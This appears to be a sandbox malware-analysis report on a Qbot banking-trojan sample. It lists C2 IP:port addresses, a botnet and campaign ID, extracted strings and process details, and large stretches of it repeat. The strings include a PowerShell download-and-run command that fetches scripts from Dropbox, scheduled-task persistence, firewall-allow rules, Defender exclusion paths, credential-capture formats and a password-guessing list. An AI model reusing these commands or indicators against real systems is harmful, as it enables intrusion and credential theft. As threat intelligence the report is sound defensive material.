71.77.231.251:443
71.80.66.107:443
71.88.104.107:995
72.16.212.108:465
72.177.157.217:995
72.183.129.56:443
72.190.101.70:443
72.204.242.138:2078
72.204.242.138:443
72.209.191.27:443
72.240.245.253:443
72.28.255.159:995
72.29.181.77:2078
72.69.180.183:61202
73.94.229.115:443
74.215.201.122:443
74.56.167.31:443
75.183.171.155:3389
75.81.25.223:443
75.87.161.32:995
76.15.41.32:443
76.170.77.99:443
76.187.8.160:443
77.237.181.212:995
78.96.192.26:443
78.97.145.242:443
79.113.219.121:443
79.115.128.221:443
79.117.161.67:21
79.119.67.149:443
80.195.103.146:2222
80.240.26.178:443
81.103.144.77:443
81.133.234.36:2222
82.127.193.151:2222
82.76.239.193:443
85.121.42.12:995
85.186.141.62:995
86.123.106.54:443
86.126.97.183:2222
89.44.195.186:2222
93.113.90.128:443
96.18.240.158:443
96.35.170.82:2222
96.37.137.42:443
96.41.93.96:443
96.56.237.174:993
97.93.211.17:443
98.114.185.3:443
98.115.138.61:443
98.118.156.172:443
98.219.77.197:443
98.32.60.217:443
SaltjHxastDcds)oMc=jvh7wdUhxcsdt2
Strings (456)/F
/c ping.exe -n 6 127.0.0.1 & type "%s\System32\calc.exe" > "%s"
/ru ""
[begin]
[end]
cookie=[%s]
data=[%s]
exe=[%s] cmdline=[%s] pid=[%u] username=[%s]
ext_ip=[%s] dnsname=[%s] hostname=[%s] user=[%S] domain=[%S] is_admin=[%s] os=[%s] qbot_version=[%s] install_time=[%s] exe=[%S] prod_id=[%s]
host=[%s:%u] user=[%s] pass=[%s]
referer=[%s]
url=[%s]
url=[%s] data=[%s]
url=[%s] lb=[%s] data=[%s]
url=[%s] user=[%s] pass=[%s]
"%s\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn %s /tr "\"%s\" /I %s" /SC ONCE /Z /ST %02u:%02u /ET %02u:%02u
"%s\system32\schtasks.exe" /DELETE /F /TN %s
"%s\system32\schtasks.exe" /create /tn %S /tr "%s" /sc %S
%%%BOT_NICK%%%
%02u.%02u.%02u-%02u/%02u/%04u
%BOTID%
%BOT_COMPUTERNAME%
%BOT_MACHINE_UUID%
%BOT_USERDOMAIN%
%BOT_USERNAME%
%BOT_VENDOR_ID%
%ProgramFiles%\Internet Explorer\iexplore.exe
%ProgramFiles(x86)%\Internet Explorer\iexplore.exe
%SystemRoot%\SysWOW64\explorer.exe
%SystemRoot%\SysWOW64\mobsync.exe
%SystemRoot%\SysWOW64\xwizard.exe
%SystemRoot%\System32\mobsync.exe
%SystemRoot%\System32\xwizard.exe
%SystemRoot%\explorer.exe
%s "$windowsupdate = \"%s\"; & $windowsupdate"
%s %04x.%u %04x.%u res: %s seh_test: %u consts_test: %d vmdetected: %d createprocess: %d
%s \"$windowsupdate = \\\"%s\\\"; & $windowsupdate\"
%s%s/dupinst.php?n=%s&bg=%s&r=%u
%s\%s.vbs
%s\System32\WindowsPowerShell\v1.0\powershell.exe "$windowsupdate = \"%s\"; & $windowsupdate"
%s\System32\WindowsPowerShell\v1.0\powershell.exe \"$windowsupdate = \\\"%s\\\"; & $windowsupdate\"
%u.%s.%s.%08x
*/*
.cfg
.dat
.dll
.exe
.lnk
/bot_serv
/t3
000
1.nvprivateoffice.info
123,password,Password,letmein,1234,12345,123456,1234567,12345678,123456789,1234567890,qwerty,love,iloveyou,princess,pussy,master,monkey,abc123,99999999,9999999,999999,99999,9999,999,99,9,88888888,8888888,888888,88888,8888,888,88,8,77777777,7777777,777777,77777,7777,777,77,7,66666666,6666666,666666,6...
1234567890
2
23.49.13.33:7000
3
307
308
309
310
311
ADMIN$
ALLUSERSPROFILE
AdjustTokenPrivileges
Administrator
AllocateAndInitializeSid
AvastSvc.exe
ByteFence.exe
C$
C:\\INTERNAL\\__empty
CWSandbox
CertAddCRLContextToStore
CertAddCTLContextToStore
CertAddCertificateContextToStore
CertCloseStore
CertCreateCertificateChainEngine
CertDuplicateCRLContext
CertEnumCertificatesInStore
CertEnumSystemStore
CertFreeCRLContext
CertFreeCertificateChain
CertFreeCertificateChainEngine
CertFreeCertificateContext
CertGetCRLContextProperty
CertGetCertificateChain
CertGetEnhancedKeyUsage
CertGetNameStringW
CertOpenStore
CertSetCertificateContextProperty
CloseHandle
CloseServiceHandle
Content-Type: application/x-www-form-urlencoded
CreateDirectoryA
CreateFileA
CreateFileW
CreateProcessA
CreateProcessInternalW
CreateProcessW
CreateRemoteThread
CreateServiceW
CreateThread
CreateToolhelp32Snapshot
CreateWindowExA
CredEnumerateA
CredFree
CryptAcquireCertificatePrivateKey
CryptEnumOIDInfo
CryptFindOIDInfo
CryptUnprotectData
DefWindowProcA
DeleteFileA
DeleteService
DeleteServiceW
DeleteUrlCacheEntryW
DestroyWindow
DispatchMessageA
DnsQuery_A
DnsQuery_W
DynamicCodePolicy
EnumWindows
ExpandEnvironmentStringsA
Fiddler.exe;samp1e.exe;sample.exe;runsample.exe;lordpe.exe;regshot.exe;Autoruns.exe;dsniff.exe;VBoxTray.exe;HashMyFiles.exe;ProcessHacker.exe;Procmon.exe;Procmon64.exe;netmon.exe;vmtoolsd.exe;vm3dservice.exe;VGAuthService.exe;pr0c3xp.exe;ProcessHacker.exe;CFF Explorer.exe;dumpcap.exe;Wireshark.exe;i...
FindClose
FindFirstFileA
FindNextFileA
FindResourceA
FindWindowA
FreeSid
FtpDeleteFileA
FtpGetFileA
FtpOpenFileA
GenuineIntel
GetClipboardData
GetCurrentDirectoryA
GetCurrentThreadId
GetForegroundWindow
GetMessageA
GetMessageW
GetModuleFileNameA
GetModuleHandleA
GetProcAddress
GetUrlCacheEntryInfoW
GetVolumeInformationA
Global\{EEE80B68-1EF4-47C2-9017-59E46A84F3BC}
HOURLY /mo 5
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestW
HttpQueryInfoA
HttpQueryInfoW
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestW
IPC$
Initializing database...
InterlockedCompareExchange
InternetCloseHandle
InternetConnectA
InternetCrackUrlA
InternetGetCookieA
InternetGetCookieExA
InternetGetLastResponseInfoA
InternetOpenA
InternetOpenUrlA
InternetQueryDataAvailable
InternetQueryOptionA
InternetQueryOptionW
InternetReadFile
InternetReadFileExA
InternetSetOptionA
InternetSetStatusCallback
InternetWriteFile
LdrGetProcedureAddress
LdrLoadDll
LoadLibraryA
LoadResource
LocalFree
LookupAccountSidA
LookupAccountSidW
MBAMService.exe;mbamgui.exe
MessageBoxA
Microsoft
MicrosoftEdge.exe
Module32First
Module32Next
MoveFileA
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
MsMpEng.exe
NAT-PMP %u tcp
NetApiBufferFree
NetGetDCName
NetShareEnum
NetUserEnum
NetWkstaGetInfo
NtAllocateVirtualMemory
NtClose
NtCreateSection
NtFreeVirtualMemory
NtGetContextThread
NtMapViewOfSection
NtProtectVirtualMemory
NtQueryInformationProcess
NtQueryVirtualMemory
NtReadVirtualMemory
NtSetContextThread
NtUnmapViewOfSection
NtWow64QueryInformationProcess64
NtWow64ReadVirtualMemory64
NtWriteVirtualMemory
ObtainUserAgentString
OpenProcess
OpenSCManagerW
OpenThread
PFXExportCertStore
PR_Close
PR_GetError
PR_GetNameForIdentity
PR_OpenTCPSocket
PR_Read
PR_SetError
PR_Write
PStoreCreateInstance
PathCombineA
PathCombineW
PathMatchSpecA
PathMatchSpecW
PathUnquoteSpacesW
PeekMessageA
PeekMessageW
PostMessageA
PostQuitMessage
Process32First
Process32Next
ProfileImagePath
QEMU
QueryFullProcessImageNameW
Query_Main
RapportGP.DLL
ReadFile
ReadProcessMemory
Red Hat VirtIO
RegCloseKey
RegCreateKeyExA
RegDeleteValueA
RegEnumKeyExA
RegEnumValueA
RegOpenKeyExA
RegQueryInfoKeyA
RegQueryValueExA
RegSetValueExA
RegisterClassExA
RtlGetVersion
RtlNtStatusToDosError
RtlSetLastWin32Error
SAVAdminService.exe;SavService.exe
SOFTWARE\Microsoft\Internet Explorer\CodeIntegrity
SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet
SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths
SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
SOFTWARE\Microsoft\Windows Defender\SpyNet
SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet
SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet
SbieDll.dll
Self test FAILED!!!
Self test OK.
SendMessageA
Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\%coot\cimv2") Set colFiles = objWMIService.ExecQuery("Select * From CIM_DataFile Where Name = '%s'") For Each objFile in colFiles objFile.Copy("%s") Next
Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\%coot\cimv2") Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process") errReturn = objProcess.Create("%s", null, nul, nul)
SetCurrentDirectoryA
SetEndOfFile
SetEntriesInAclA
SetFilePointer
SetLastError
SetNamedSecurityInfoA
ShellExecuteA
ShowWindow
SizeofResource
SpyNetReporting
StackWalk64
StartServiceW
StrCmpIW
StrCmpNIA
StrStrIA
StrStrIW
StrStrW
StrTrimW
SubmitSamplesConsent
TranslateMessage
UnregisterClassA
UpdateWindow
VBoxGuest
VBoxVideo
VMAUDIO
VMware Accelerated
VMware Pointing
VMware Replay
VMware SCSI
VMware SVGA
VMware VMaudio
VMware Vista
VMware server memory
Virtual HD
VirtualAllocEx
VirtualFreeEx
VirtualProtect
VirtualProtectEx
WBJ_IGNORE
WEEKLY /D TUE,WED,THU /ST 12:00:00
WNetAddConnection2W
WNetCancelConnection2W
WNetCloseEnum
WNetEnumResourceW
WNetOpenEnumW
WRSA.exe
WSAConnect
WSAGetLastError
WSASend
WSASetLastError
WScript.Sleep %u Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\%coot\cimv2") Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process") errReturn = objProcess.Create("%s", null, nul, nul) WSCript.Sleep 2000 Set fso = CreateObject("Scripting.FileSystemObject")...
WTSEnumerateSessionsW
WTSFreeMemory
WTSQuerySessionInformationW
WTSQueryUserToken
WaitForSingleObject
Windows10 Edge HttpQueryInfo Bug!!!
WriteFile
WriteProcessMemory
ZwQueryInformationThread
ZwResumeThread
\sf2.dll
_decrypted.file;MultiAnalysis_v
aabcdeefghiijklmnoopqrstuuvwxyyz
aaebcdeeifghiiojklmnooupqrstuuyvwxyyaz
abc
abcdefghijklmnopqrstuvwxyz
administrator,argo,operator,administrador,user,prof,owner,usuario,admin,HP_Administrator,HP_Owner,Compaq_Owner,Compaq_Administrator
advapi32.dll
ansfltr
application/x-shockwave-flash
artifact.exe
aswhooka.dll
aswhookx.dll
avcuf32.dll
avgcsrvx.exe;avgsvcx.exe;avgcsrva.exe
avp.exe;kavtray.exe
bdagent.exe;vsserv.exe;vsservppl.exe
c1
c:\hiberfil.sysss
cashmanagementconnectionstring
ccSvcHst.exe
chrome.dll
chrome_child.dll
cmd /c schtasks.exe /Query > "%s"
cmd.exe /C \"start /MIN %s\system32\cscript.exe //E:javascript \"%s\"\" sudhfdus
cmd.exe /c ping -n 10 localhost && rmdir /S /Q "%s"
cmd=1&msg=%s&ports=
comet.yahoo.com;.hiro.tv;safebrowsing.google.com;geo.query.yahoo.com;googleusercontent.com;salesforce.com;officeapps.live.com;storage.live.com;messenger.live.com;.twimg.com;api.skype.com;mail.google.com;.bing.com;playtoga.com;.mozilla.com;.mozilla.org;hotbar.com;lphbs.com;contacts.msn.com;search.msn...
connect
coreServiceShell.exe;PccNTMon.exe;NTRTScan.exe
crypt32.dll
cryptui.dll
cscript.exe
data_after
data_before
data_end
data_inject
dbghelp.dll
dnsapi.dll
egui.exe;ekrn.exe
error res='%s' err=%d len=%u
exclude_url
explorer.exe
f1
firefox.exe
fmon.exe
fshoster32.exe
h1
h2
h3
https://
https://cdn.speedof.me/sample4096k.bin?r=0.%u
https://en.wikipedia.org/static/apple-touch/wikipedia.png
i1
i2
i3
i4
ignore_url
image/gif
image/jpeg
image/pjpeg
ivm-inject.dll
jHxastDcds)oMc=jvh7wdUhxcsdt2
k1
kb
kernel32.dll
m1
mcshield.exe
metsvc-server.exe
mlwr_smpl
mpr.dll
netapi32.dll
netsh advfirewall firewall add rule name="%s" dir=in action=allow program="%s" enable=yes
netsh firewall set allowedprogram "%s" %s ENABLE
netteller.com
npl
npq
nspr4.dll
nss3.dll
ntdll.dll
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1'); IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1'); Invoke-MainWorker -Command '%s'"
pstorec.dll
qbot_conf_path='%S' username='%S'
qbot_run_mutex='%s' username='%S'
reg.exe ADD "HKLM\%s" /f /t %s /v "%s" /d "%s"
rsabase.dll
rsaenh.dll
s2
sample
sbtisht
send
set_url
shell32.dll
shlwapi.dll
siteadvisor.com;avgthreatlabs.com;safeweb.norton.com
snxhk_border_mywnd
srootkit
t=%s time=[%02d:%02d:%02d-%02d/%02d/%d]
tcpdump.exe;windump.exe;ethereal.exe;wireshark.exe;ettercap.exe;rtsniff.exe;packetcapture.exe;capturenet.exe
u1
urlmon.dll
user32.dll
vSockets
vkise.exe;isesrv.exe;cmdagent.exe
vm3dmp
vmacthlp.exe
vmdebug
vmnat.exe
vmrawdsk
vmscsi
vmtoolsd.exe
vmx_svga
vmxnet
w1
wbj.go
webinjects.cb
windbg.exe;ChromeUpdate.exe;msdev.exe;dbgview.exe;ollydbg.exe;ctfmon.exe;Proxifier.exe;nav.exe;Microsoft.Notes.exe;ShellExperienceHost.exe;SecHealthUI.exe
windump.exe
wininet.dll
wpcap.dll
ws2_32.dll
wtsapi32.dll
{%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X}
3240"C:\Program Files\Windows Media Player\wmpnscfg.exe"C:\Program Files\Windows Media Player\wmpnscfg.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Media Player Network Sharing Service Configuration Application
Exit code:
0
Version:
12.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\sspicli.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
3548C:\Users\admin\AppData\Local\Temp\sample_packed.exe /CC:\Users\admin\AppData\Local\Temp\sample_packed.exe
sample_packed.exe
User:
admin
Company:
Lovelysoft
Integrity Level:
MEDIUM
Description:
Remote Performance Expert Helper Object
Exit code:
3221225622
Version:
1.8.0.1800
Modules
Images
c:\users\admin\appdata\local\temp\sample_packed.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
3612"C:\Windows\system32\cmd.exe" C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
3221225786
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3640"C:\Windows\system32\verclsid.exe" /S /C {0B2C9183-C9FA-4C53-AE21-C900B0C39965} /I {0C733A8A-2A1C-11CE-ADE5-00AA0044773D} /X 0x401C:\Windows\System32\verclsid.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Extension CLSID Verification Host
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\verclsid.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3956"C:\Users\admin\AppData\Local\Temp\sample_packed.exe" C:\Users\admin\AppData\Local\Temp\sample_packed.exe
explorer.exe
User:
admin
Company:
Lovelysoft
Integrity Level:
MEDIUM
Description:
Remote Performance Expert Helper Object
Exit code:
0
Version:
1.8.0.1800
Modules
Images
c:\users\admin\appdata\local\temp\sample_packed.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
3980"C:\Users\admin\AppData\Local\Temp\sample_packed.exe" C:\Users\admin\AppData\Local\Temp\sample_packed.exe
explorer.exe
User:
admin
Company:
Lovelysoft
Integrity Level:
MEDIUM
Description:
Remote Performance Expert Helper Object
Exit code:
0
Version:
1.8.0.1800
Modules
Images
c:\users\admin\appdata\local\temp\sample_packed.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
Qbot
(PID) Process(3980) sample_packed.exe
Botnetspx133
Campaign1591267427
Version324.142
C2 (149)1.40.42.4:443
100.38.123.22:443
104.221.4.11:2222
104.50.141.139:995
105.184.48.142:443
108.27.217.44:443
108.31.92.113:443
108.51.73.186:443
108.58.9.238:993
108.58.9.238:995
128.234.46.27:443
134.0.196.46:995
137.103.143.124:443
140.82.21.191:443
142.129.227.86:443
151.73.126.205:443
173.172.205.216:443
173.175.29.210:443
173.187.169.73:443
173.22.120.11:2222
173.245.152.231:443
173.49.122.160:995
173.79.220.156:443
174.34.67.106:2222
175.111.128.234:443
176.193.41.32:2222
184.180.157.203:2222
184.98.104.7:995
185.246.9.69:995
188.192.75.8:443
188.192.75.8:995
188.27.71.163:443
189.140.112.184:443
189.159.133.162:995
197.165.178.49:443
2.88.183.192:443
203.33.139.134:443
207.162.184.228:443
207.255.161.8:2078
207.255.161.8:2087
207.255.161.8:2222
207.255.161.8:32102
207.255.161.8:32103
207.255.18.67:443
216.163.4.91:443
216.201.162.158:995
24.10.42.174:443
24.152.219.253:995
24.201.79.208:2078
24.226.137.154:443
24.42.14.241:443
24.43.22.220:443
24.43.22.220:995
24.46.40.189:2222
24.99.180.247:443
47.136.224.60:443
47.146.169.85:443
47.152.210.233:443
47.153.115.154:443
47.153.115.154:995
47.201.1.210:443
47.205.231.60:443
47.35.182.97:443
47.40.244.237:443
49.144.84.21:443
49.191.4.245:443
5.12.114.96:443
5.13.99.38:995
5.14.251.226:443
50.244.112.106:443
50.244.112.10:443
50.247.230.33:995
50.29.181.193:995
59.124.10.133:443
62.121.123.57:443
62.38.111.70:2222
64.121.114.87:443
64.19.74.29:995
65.131.83.170:995
65.24.76.114:443
66.222.88.126:995
66.26.160.37:443
67.131.59.17:443
67.209.195.198:3389
67.5.28.72:465
67.83.54.76:2222
68.174.15.223:443
69.245.144.167:443
69.28.222.54:443
69.40.17.142:443
69.92.54.95:995
70.174.3.241:443
70.183.127.6:995
71.163.225.75:443
71.185.60.227:443
71.187.170.235:443
71.77.231.251:443
71.80.66.107:443
71.88.104.107:995
72.16.212.108:465
72.177.157.217:995
72.183.129.56:443
72.190.101.70:443
72.204.242.138:2078
72.204.242.138:443
72.209.191.27:443
72.240.245.253:443
72.28.255.159:995
72.29.181.77:2078
72.69.180.183:61202
73.94.229.115:443
74.215.201.122:443
74.56.167.31:443
75.183.171.155:3389
75.81.25.223:443
75.87.161.32:995
76.15.41.32:443
76.170.77.99:443
76.187.8.160:443
77.237.181.212:995
78.96.192.26:443
78.97.145.242:443
79.113.219.121:443
79.115.128.221:443
79.117.161.67:21
79.119.67.149:443
80.195.103.146:2222
80.240.26.178:443
81.103.144.77:443
81.133.234.36:2222
82.127.193.151:2222
82.76.239.193:443
85.121.42.12:995
85.186.141.62:995
86.123.106.54:443
86.126.97.183:2222
89.44.195.186:2222
93.113.90.128:443
96.18.240.158:443
96.35.170.82:2222
96.37.137.42:443
96.41.93.96:443
96.56.237.174:993
97.93.211.17:443
98.114.185.3:443
98.115.138.61:443
98.118.156.172:443
98.219.77.197:443
98.32.60.217:443
SaltjHxastDcds)oMc=jvh7wdUhxcsdt2
Strings (456)/F
/c ping.exe -n 6 127.0.0.1 & type "%s\System32\calc.exe" > "%s"
/ru ""
[begin]
[end]
cookie=[%s]
data=[%s]
exe=[%s] cmdline=[%s] pid=[%u] username=[%s]
ext_ip=[%s] dnsname=[%s] hostname=[%s] user=[%S] domain=[%S] is_admin=[%s] os=[%s] qbot_version=[%s] install_time=[%s] exe=[%S] prod_id=[%s]
host=[%s:%u] user=[%s] pass=[%s]
referer=[%s]
url=[%s]
url=[%s] data=[%s]
url=[%s] lb=[%s] data=[%s]
url=[%s] user=[%s] pass=[%s]
"%s\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn %s /tr "\"%s\" /I %s" /SC ONCE /Z /ST %02u:%02u /ET %02u:%02u
"%s\system32\schtasks.exe" /DELETE /F /TN %s
"%s\system32\schtasks.exe" /create /tn %S /tr "%s" /sc %S
%%%BOT_NICK%%%
%02u.%02u.%02u-%02u/%02u/%04u
%BOTID%
%BOT_COMPUTERNAME%
%BOT_MACHINE_UUID%
%BOT_USERDOMAIN%
%BOT_USERNAME%
%BOT_VENDOR_ID%
%ProgramFiles%\Internet Explorer\iexplore.exe
%ProgramFiles(x86)%\Internet Explorer\iexplore.exe
%SystemRoot%\SysWOW64\explorer.exe
%SystemRoot%\SysWOW64\mobsync.exe
%SystemRoot%\SysWOW64\xwizard.exe
%SystemRoot%\System32\mobsync.exe
%SystemRoot%\System32\xwizard.exe
%SystemRoot%\explorer.exe
%s "$windowsupdate = \"%s\"; & $windowsupdate"
%s %04x.%u %04x.%u res: %s seh_test: %u consts_test: %d vmdetected: %d createprocess: %d
%s \"$windowsupdate = \\\"%s\\\"; & $windowsupdate\"
%s%s/dupinst.php?n=%s&bg=%s&r=%u
%s\%s.vbs
%s\System32\WindowsPowerShell\v1.0\powershell.exe "$windowsupdate = \"%s\"; & $windowsupdate"
%s\System32\WindowsPowerShell\v1.0\powershell.exe \"$windowsupdate = \\\"%s\\\"; & $windowsupdate\"
%u.%s.%s.%08x
*/*
.cfg
.dat
.dll
.exe
.lnk
/bot_serv
/t3
000
1.nvprivateoffice.info
123,password,Password,letmein,1234,12345,123456,1234567,12345678,123456789,1234567890,qwerty,love,iloveyou,princess,pussy,master,monkey,abc123,99999999,9999999,999999,99999,9999,999,99,9,88888888,8888888,888888,88888,8888,888,88,8,77777777,7777777,777777,77777,7777,777,77,7,66666666,6666666,666666,6...
1234567890
2
23.49.13.33:7000
3
307
308
309
310
311
ADMIN$
ALLUSERSPROFILE
AdjustTokenPrivileges
Administrator
AllocateAndInitializeSid
AvastSvc.exe
ByteFence.exe
C$
C:\\INTERNAL\\__empty
CWSandbox
CertAddCRLContextToStore
CertAddCTLContextToStore
CertAddCertificateContextToStore
CertCloseStore
CertCreateCertificateChainEngine
CertDuplicateCRLContext
CertEnumCertificatesInStore
CertEnumSystemStore
CertFreeCRLContext
CertFreeCertificateChain
CertFreeCertificateChainEngine
CertFreeCertificateContext
CertGetCRLContextProperty
CertGetCertificateChain
CertGetEnhancedKeyUsage
CertGetNameStringW
CertOpenStore
CertSetCertificateContextProperty
CloseHandle
CloseServiceHandle
Content-Type: application/x-www-form-urlencoded
CreateDirectoryA
CreateFileA
CreateFileW
CreateProcessA
CreateProcessInternalW
CreateProcessW
CreateRemoteThread
CreateServiceW
CreateThread
CreateToolhelp32Snapshot
CreateWindowExA
CredEnumerateA
CredFree
CryptAcquireCertificatePrivateKey
CryptEnumOIDInfo
CryptFindOIDInfo
CryptUnprotectData
DefWindowProcA
DeleteFileA
DeleteService
DeleteServiceW
DeleteUrlCacheEntryW
DestroyWindow
DispatchMessageA
DnsQuery_A
DnsQuery_W
DynamicCodePolicy
EnumWindows
ExpandEnvironmentStringsA
Fiddler.exe;samp1e.exe;sample.exe;runsample.exe;lordpe.exe;regshot.exe;Autoruns.exe;dsniff.exe;VBoxTray.exe;HashMyFiles.exe;ProcessHacker.exe;Procmon.exe;Procmon64.exe;netmon.exe;vmtoolsd.exe;vm3dservice.exe;VGAuthService.exe;pr0c3xp.exe;ProcessHacker.exe;CFF Explorer.exe;dumpcap.exe;Wireshark.exe;i...
FindClose
FindFirstFileA
FindNextFileA
FindResourceA
FindWindowA
FreeSid
FtpDeleteFileA
FtpGetFileA
FtpOpenFileA
GenuineIntel
GetClipboardData
GetCurrentDirectoryA
GetCurrentThreadId
GetForegroundWindow
GetMessageA
GetMessageW
GetModuleFileNameA
GetModuleHandleA
GetProcAddress
GetUrlCacheEntryInfoW
GetVolumeInformationA
Global\{EEE80B68-1EF4-47C2-9017-59E46A84F3BC}
HOURLY /mo 5
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestW
HttpQueryInfoA
HttpQueryInfoW
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestW
IPC$
Initializing database...
InterlockedCompareExchange
InternetCloseHandle
InternetConnectA
InternetCrackUrlA
InternetGetCookieA
InternetGetCookieExA
InternetGetLastResponseInfoA
InternetOpenA
InternetOpenUrlA
InternetQueryDataAvailable
InternetQueryOptionA
InternetQueryOptionW
InternetReadFile
InternetReadFileExA
InternetSetOptionA
InternetSetStatusCallback
InternetWriteFile
LdrGetProcedureAddress
LdrLoadDll
LoadLibraryA
LoadResource
LocalFree
LookupAccountSidA
LookupAccountSidW
MBAMService.exe;mbamgui.exe
MessageBoxA
Microsoft
MicrosoftEdge.exe
Module32First
Module32Next
MoveFileA
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
MsMpEng.exe
NAT-PMP %u tcp
NetApiBufferFree
NetGetDCName
NetShareEnum
NetUserEnum
NetWkstaGetInfo
NtAllocateVirtualMemory
NtClose
NtCreateSection
NtFreeVirtualMemory
NtGetContextThread
NtMapViewOfSection
NtProtectVirtualMemory
NtQueryInformationProcess
NtQueryVirtualMemory
NtReadVirtualMemory
NtSetContextThread
NtUnmapViewOfSection
NtWow64QueryInformationProcess64
NtWow64ReadVirtualMemory64
NtWriteVirtualMemory
ObtainUserAgentString
OpenProcess
OpenSCManagerW
OpenThread
PFXExportCertStore
PR_Close
PR_GetError
PR_GetNameForIdentity
PR_OpenTCPSocket
PR_Read
PR_SetError
PR_Write
PStoreCreateInstance
PathCombineA
PathCombineW
PathMatchSpecA
PathMatchSpecW
PathUnquoteSpacesW
PeekMessageA
PeekMessageW
PostMessageA
PostQuitMessage
Process32First
Process32Next
ProfileImagePath
QEMU
QueryFullProcessImageNameW
Query_Main
RapportGP.DLL
ReadFile
ReadProcessMemory
Red Hat VirtIO
RegCloseKey
RegCreateKeyExA
RegDeleteValueA
RegEnumKeyExA
RegEnumValueA
RegOpenKeyExA
RegQueryInfoKeyA
RegQueryValueExA
RegSetValueExA
RegisterClassExA
RtlGetVersion
RtlNtStatusToDosError
RtlSetLastWin32Error
SAVAdminService.exe;SavService.exe
SOFTWARE\Microsoft\Internet Explorer\CodeIntegrity
SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet
SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths
SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
SOFTWARE\Microsoft\Windows Defender\SpyNet
SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet
SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet
SbieDll.dll
Self test FAILED!!!
Self test OK.
SendMessageA
Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\%coot\cimv2") Set colFiles = objWMIService.ExecQuery("Select * From CIM_DataFile Where Name = '%s'") For Each objFile in colFiles objFile.Copy("%s") Next
Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\%coot\cimv2") Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process") errReturn = objProcess.Create("%s", null, nul, nul)
SetCurrentDirectoryA
SetEndOfFile
SetEntriesInAclA
SetFilePointer
SetLastError
SetNamedSecurityInfoA
ShellExecuteA
ShowWindow
SizeofResource
SpyNetReporting
StackWalk64
StartServiceW
StrCmpIW
StrCmpNIA
StrStrIA
StrStrIW
StrStrW
StrTrimW
SubmitSamplesConsent
TranslateMessage
UnregisterClassA
UpdateWindow
VBoxGuest
VBoxVideo
VMAUDIO
